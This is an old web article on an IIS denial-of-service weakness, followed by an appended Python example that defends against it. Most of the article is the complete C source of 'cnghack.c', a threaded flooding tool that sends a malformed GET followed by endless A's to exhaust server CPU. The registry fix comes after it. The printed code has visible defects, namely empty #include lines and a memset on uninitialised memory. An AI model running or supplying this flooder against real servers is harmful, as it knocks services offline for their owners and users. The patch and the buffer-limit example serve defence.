
ASP Vulnerability Analysis and Solutions (5)

2004-10-01 08:26:10  Source: Internet
Keywords: vulnerability analysis, methods, ASP

17 IIS web server DOS

  Vulnerability description:

  By default, IIS is susceptible to denial-of-service attacks. If a registry value named "MaxClientRequestBuffer" has not been created, an attack against such an NT system usually succeeds. The "MaxClientRequestBuffer" value sets how much input IIS will accept: if it is set to 256 (bytes), an attacker who tries to flood IIS with a very long request is limited to 256 bytes. The system default imposes no limit at all, so the following program can easily mount a DoS attack against an IIS server:

#include
#include

#define MAX_THREAD 666

void cng();

char *server;
char *buffer;
int port;
int counter = 0;
int current_threads = 0;

int main(int argc, char **argv)
{
    WORD tequila;
    WSADATA data;
    int p;
    DWORD tid;
    HANDLE hThread[2000];

    //This code is as is and sucks as it is. Won't exit correctly and a lot of other fun things.
    //That I didn't want to take the time to do. So just ctrl+c out of the code.
    //Load up cnghack.exe 3 times for charm.

    printf("CNG IIS DoS.\nMarc@eEye.com\nhttp://www.eeye.com\n\"For my beloved.\"\n");

    if(argc<2){
        printf("Usage: %s [server] [port]\n",argv[0]);
        exit(1);
    }

    buffer=malloc(17500);
    memset( buffer, 'A', strlen(buffer));
    server=argv[1];
    port=atoi(argv[2]);

    tequila = MAKEWORD( 1, 1 );
    printf("Attempting to start winsock... ");
    if( (WSAStartup(tequila, &data)) !=0 ){
        printf("failed to start winsock.\n");
        exit(1);
    }
    else{
        printf("started winsock.\n\n");
    }

    counter = 0;
    for(p = 0 ; p < MAX_THREAD ; ++p ){
        hThread[counter] = CreateThread(0,
                                        0,
                                        (LPTHREAD_START_ROUTINE) cng,
                                        ( void * )++counter,
                                        0,
                                        &tid);
    }

    Sleep(250);
    while( current_threads )
        Sleep(250);

    counter = 0;
    printf("Terminated Threads.\n");
    while (counter < MAX_THREAD)
    {
        TerminateThread( hThread[counter], 0 );
        ++counter;
    }

    WSACleanup();
    return 0;
}

void cng()
{
    int SockFD=0, p;
    struct sockaddr_in DstSAin;
    char GETKILLED[]="GET / HTTP/\r\n";
    int die=1;

    printf("Entered CNG\n");
    ++current_threads;

    DstSAin.sin_family = AF_INET;
    DstSAin.sin_port = htons((u_short)port);
    DstSAin.sin_addr.s_addr=inet_addr( server );

    if((SockFD = socket(AF_INET, SOCK_STREAM, 0)) < 0){
        printf("Failed to create socket\n");
        --current_threads;
        return;
    }

    if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
    {
        p=send(SockFD,GETKILLED,strlen(GETKILLED),0);
        printf("Step 1: %i\n", p);
        for(;;){
            p=send(SockFD,buffer,strlen(buffer),0);
            printf("P: %i\n", p);
            //put in some code to check if send = -1 more then X times we drop the loop and exit the thread
            //bla bla bla i love the dirtiness of concept code.
        }
    }

    --current_threads;
    printf("Exited CNG\n");
    return;
}

cnghack.c works by doing the following:

Connects to example.com

Sends: GET / HTTP/[return][buffer]

Where:

[return] is just an \r\n

[buffer] is a never ending stream of A's

  The attack drives the NT system's CPU usage to 100%.

  Solution

  Run Regedt32.exe and, under

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\w3svc\parameters

add a value:

Value Name: MaxClientRequestBuffer

Data Type: REG_DWORD

  Enter it as a decimal number.

  Set it to the maximum URL length you want IIS to accept.

  CNNS sets it to 256.
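The defensive idea behind MaxClientRequestBuffer, as an added example that is not part of the original article or of cnghack.c: a request reader that refuses to buffer more than a fixed number of bytes, exercised against a constructed stand-in for the byte stream cnghack.c sends ("GET / HTTP/" plus endless A's). The names read_request_head, FloodStream and sample are chosen here; the 256-byte limit is the one the article recommends.

```python
import io
import re

# A request line must carry a full HTTP version; cnghack.c sends "GET / HTTP/"
# with none, so it is rejected before any of the flood that follows is buffered.
REQUEST_LINE = re.compile(rb"^[A-Z]+ \S+ HTTP/\d\.\d$")

def read_request_head(stream, max_buffer=256, chunk=64):
    """Read request line + headers from a socket-like object, buffering at most
    max_buffer bytes, which is the role MaxClientRequestBuffer plays for IIS.
    Returns (status, bytes_consumed); status is one of 'accepted',
    'bad-request-line', 'too-large' or 'truncated'."""
    buf, consumed, line_ok = b"", 0, False
    while b"\r\n\r\n" not in buf:
        data = stream.read(chunk)
        if not data:
            return "truncated", consumed
        consumed += len(data)
        buf += data
        # Validate the request line as soon as it is complete, before spending
        # any more buffer on whatever the client sends after it.
        if not line_ok and b"\r\n" in buf:
            if not REQUEST_LINE.match(buf.split(b"\r\n", 1)[0]):
                return "bad-request-line", consumed
            line_ok = True
        # Without this cap the server would keep buffering the A's forever.
        if len(buf) > max_buffer:
            return "too-large", consumed
    return "accepted", consumed

class FloodStream:
    """Constructed stand-in for a client socket: a fixed prefix followed by an
    endless run of 'A' bytes, the [buffer] pattern cnghack.c describes."""

    def __init__(self, prefix):
        self.prefix = prefix

    def read(self, n):
        out, self.prefix = self.prefix[:n], self.prefix[n:]
        return out + b"A" * (n - len(out))

def sample(name):
    """Constructed sample clients: 'normal', 'cnghack' and 'flood'."""
    if name == "normal":
        return io.BytesIO(b"GET /default.asp HTTP/1.0\r\nHost: www.example.com\r\n\r\n")
    if name == "cnghack":  # exactly the bytes cnghack.c sends
        return FloodStream(b"GET / HTTP/\r\n")
    return FloodStream(b"GET / HTTP/1.0\r\n")  # valid line, but the headers never end
```

With the 256-byte cap the 'flood' client is cut off after five 64-byte reads (320 bytes consumed); without a cap that loop would never end.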
